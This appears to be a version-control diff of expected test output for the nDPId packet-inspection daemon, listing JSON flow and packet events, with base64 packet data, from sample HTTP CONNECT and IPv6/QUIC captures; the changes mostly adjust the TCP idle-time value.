00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}}
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":57373,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1631454722977}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 100/100

166
test/results/http_ipv6.pcap.out
View File

@@ -1,100 +1,100 @@
00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_ipv6.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1448269123954}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269123954,"flow_last_seen":1448269123954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269123954,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1448269123954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123954,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIBAAAAAAAACAOnk4Bu0sl6VcU0QFTgBAA8iVzAAABAQgKEg1o4A\/E+0k="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123971,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggEAAAAAAAAIA4qAA1AAAEAA3qswP\/+pw1MAbueThTRAVNLJelYgBABCVvaAAABAQgKD8WrNBINPNs="}
00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":268,"pkt_l4_len":214,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAANYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcnAKcmsggBgBYRYsAAABAQgKEg1sPOPdU5wXAwMAsUohbF6hqm2iPbr5acUercfvDKKXo6eRxQREALqHMULPkKcrij9I+s937a+Ptj\/48lLHQ1Wb3SgwI5IkBSOhrv6IVrq\/yOhvf7XOjabBqvbdcaHqf1DGDHgPPOpYr+dJO5wcSH25xkyZHXLU0QNqpczDg7dKCMPOVcOltspkl5ZzoyNyh0jvlmeYCBWg6kXBip25FBniFP0s4NZksUmy3aWhoSbUDQ+LvhRDb4xtwZyJTw=="}
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269123954,"flow_last_seen":1448269123954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269123954,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1448269123954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123954,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIBAAAAAAAACAOnk4Bu0sl6VcU0QFTgBAA8iVzAAABAQgKEg1o4A\/E+0k="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123971,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggEAAAAAAAAIA4qAA1AAAEAA3qswP\/+pw1MAbueThTRAVNLJelYgBABCVvaAAABAQgKD8WrNBINPNs="}
00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":268,"pkt_l4_len":214,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAANYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcnAKcmsggBgBYRYsAAABAQgKEg1sPOPdU5wXAwMAsUohbF6hqm2iPbr5acUercfvDKKXo6eRxQREALqHMULPkKcrij9I+s937a+Ptj\/48lLHQ1Wb3SgwI5IkBSOhrv6IVrq\/yOhvf7XOjabBqvbdcaHqf1DGDHgPPOpYr+dJO5wcSH25xkyZHXLU0QNqpczDg7dKCMPOVcOltspkl5ZzoyNyh0jvlmeYCBWg6kXBip25FBniFP0s4NZksUmy3aWhoSbUDQ+LvhRDb4xtwZyJTw=="}
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="}
00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1448269127400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127400,"pkt":"UMWNrEEBeKzApw1Mht1gAAAABU4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwVOGq8NSb7i0\/DtzNZRMDI1AdhpfiGrZQ0z8Xo88wCgAQAEQ0hMTxcAAABQQUQAlQEAAFNOSQCiAQAAU1RLANwBAABWRVIA4AEAAENDUwDoAQAATk9OQwgCAABNU1BDDAIAAEFFQUQQAgAAVUFJRDACAABTQ0lEQAIAAFRDSUREAgAAUERNREgCAABTUkJGTAIAAElDU0xQAgAAUFVCU3ACAABTQ0xTdAIAAEtFWFN4AgAAQ09QVHgCAABDQ1JUkAIAAElSVFSUAgAAQ0VUVjgDAABDRkNXPAMAAFNGQ1dAAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3Lmdvb2dsZS5pdP6VATCysYcS+6UyHFs91qYSgNdeDzmk0IEyIe5t2+bJKAI2qamMt0i7KMYplR0K0jnCGwmAm\/d3HOJRMDI1eybp5+Rccf9WUtVHu\/cGtxBbc83x\/ixhHuZYGb85GDRSl0WTDzqXHGQAAABDQzEyQ2hyb21lLzQ2LjAuMjQ5MC44MCBMaW51eCB4ODZfNjRJY0N+fBRzPpi9ZOX2cffRAAAAAFg1MDkAABAAHgAAAKnIKfkyK+SzUnB6164ARpx8JYjcWyR0opR8VfpSZa5LAQAAAEMyNTWqEkFTJwbowuJjGoJ9cYVfQAt7kKmueesKxAMAMPg3G85FTSE++LOaAtQpI1KVeq729JfhjhoCsaupNHH2PFh7nIyQFBUHu\/yG69qYF+ZOXnLeZQlagMSAtKsuormBERnE1N5BArSjLGqyjEsI7xMsjf+GWiD9zqRxEMc6cBgFvzaEvMvxi2SGPZg7npVciNOVP9ZU7k0lklFQEmkIVXhAz857PhdAM9F8uaoJzSnjSvvppgNKNbAOmmtmPDeC+pIAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="}
02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1448269127425,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127425,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAABU4ROCoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbuzawVOyY8AAb8WJ6Bcd8sMmCgT1ZAbf9HJtJU65m4+bYpFMYi142VYaY8+t63\/dljK20Pk6Hvm9ZGbc4Et8i29+QvT1kI6MUSu9s3cUHjnw2xTVTxhsAZQm3P8lhXGD3mDtRkg1sEr5Q7cUyyDCLFUAAa6oJdZ2+wjH2gcLInCstN8U\/9bx6mOB4zttEHtP4c5+\/9wVsqFhWr8fRfl3NhWM5wR+Zg8+H9Dwriy2djsTqMxZ15btYw8HWKV3SpS+cchPqkycwN+jDrgd3LuUYlETydIegf69eD\/JtLcKLFbEN5\/5QkOg9oAmwqqCClTPJLTkbez9M4pFkrM2VJDxnT19PvnGpVdwH0wIvKNgr8RVKNTlGILXC+9jJMPkA9tVfHgEWzHqgG+WxljhwAd4QSufx6LSzCoBsf86nBeKfgcGq9lFFZLToMS1VjjSASPtZOvlSLyuxjHryC2XTxpVHUN\/PBKPgXBScR4DFFlJHRdFSNH3eaciyVInAjiCfV6HJYS+DuTQgUqjcyAG5tuDXYslL4LNyVesK76J8Q9FVPv6Ab4vTklEVJejFK80Cn8IouJ9WHz8uTM24UHbOmpAA\/c+EPPNLCB9F8iGG66BwJvUEBHZ3Ygj9rnWqSJgSU55vdrYi5luNP1KoXM4YmziEg8e+xJprdp11YpNV+0lAxdI0zR9s3KRF+wKmv6XtU8gBoCwTHodAHf32dQGfVior2u\/KHctDxD8nHTXU0AZV0DGAOL04YVg9K9w3y4THfVYJpIoP+uyoruQl0rsX9ENsZ5qS+dOXnu5LcoS2EGP16jbi7uY9ogtSWghhTOmmCzmJAGprVn6JTMBLO193Vra3mqDuGuMUOZM\/l8mB81H2MusGIWIde9dns9dj2AG\/cfGaDWSays\/fK3VtGGTBv7FaSH\/aw\/Q2zkhNIJX\/WFH6YUEleLUh25ypFwius1sBxwKIcgK2ijlBJ8pqokusSGJDg\/c4+DqzUrA93\/HrO5AiXdFCeRaHb7qWTzL0p26M50TOgV5ZhM261i0CZOTvKrCn9iZeIH3z5r82ZP101c8INU8PByLFZYWSBQLEx1DNpqjwLojRfhTpMW5JdNN\/sTmhr77P3fBJRr6WfjS8BevHVq9cSi8laxJh0JQkiYq6WSdgUPITf15zal35ZU99gHjN8lHKLEe4ulo25UZrSeatzSMZUm5A91iw1tGWfGpH4DfLZt8Ntly9VWHd\/87hCB87\/piwS6u4+4ryQp4GDxllbW\/SkuP\/IAA9Zuq742fzBVuJkS4BpNCthxU0Qle\/rg\/gQjlJJVbj2FDnbMgmtbocxxIFkNS+NNJJEtuvLnbQCDuw8uZDIIX7G8SvS+F8HVI+jLOPdR15E6Pnf84ervCPA5o0JfpJr+Ni3PIRv3FKi+p5DZaL1kmCkPEBtHdwkl3y2psiuigxSpcsFcwghyrpx9hiMFpPOeQbZd1kDbqrcKz3DwJXNrOM5TljZcc+q\/sTNd3axpOt7TtQGaRTUzdKfgFeiq5EoRUpye4hhSuSwq98WPbz5OcLGEG00xOPY3pwtztgP3Hft4qU9pxAWCD6O+UUk1tCU0r2xCd25EV4iBdLikeLpIHEfcmHIJd72ETZjpLfti3i9QaSkD\/AsqiENwvRS6H7x34vPid3KkvLGz\/SjeWjBz44e2RAwUEkK\/6QdG765SHEZEytfd\/\/s1VN9Lrlmg\/JhogP6qMLZp6e145R0qbs7qAEZeb\/fZQhZM2cMG0S3vs2+Qg8KLzxAegZ7RC0gS+QzKcRpj6NRz\/TYo6NL+7\/Uv2rcnFhb6N0M="}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1448269127426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"thread_ts_msec":1448269127426,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwAtFY4MSb7i0\/DtzNYC4PYSufRYk3sdRNPxvPTHCMs5+9cyKuKyC\/5g"}
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127922,"flow_last_seen":1448269127922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269127922,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1448269127922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127922,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIAwAAAAAAACAI5SQBuwROHG\/ILPHEgBACniVsAAABAQgKEg1swGh+tvU="}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127940,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggDAAAAAAAAIAgqAA1AAAEAA3qswP\/+pw1MAbvlJMgs8cQEThxwgBAA+ZiqAAABAQgKaH9m+RINFL8="}
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127922,"flow_last_seen":1448269127922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269127922,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1448269127922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127922,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIAwAAAAAAACAI5SQBuwROHG\/ILPHEgBACniVsAAABAQgKEg1swGh+tvU="}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127940,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggDAAAAAAAAIAgqAA1AAAEAA3qswP\/+pw1MAbvlJMgs8cQEThxwgBAA+ZiqAAABAQgKaH9m+RINFL8="}
00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127960,"flow_last_seen":1448269127960,"flow_idle_time":180000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1448269127960,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
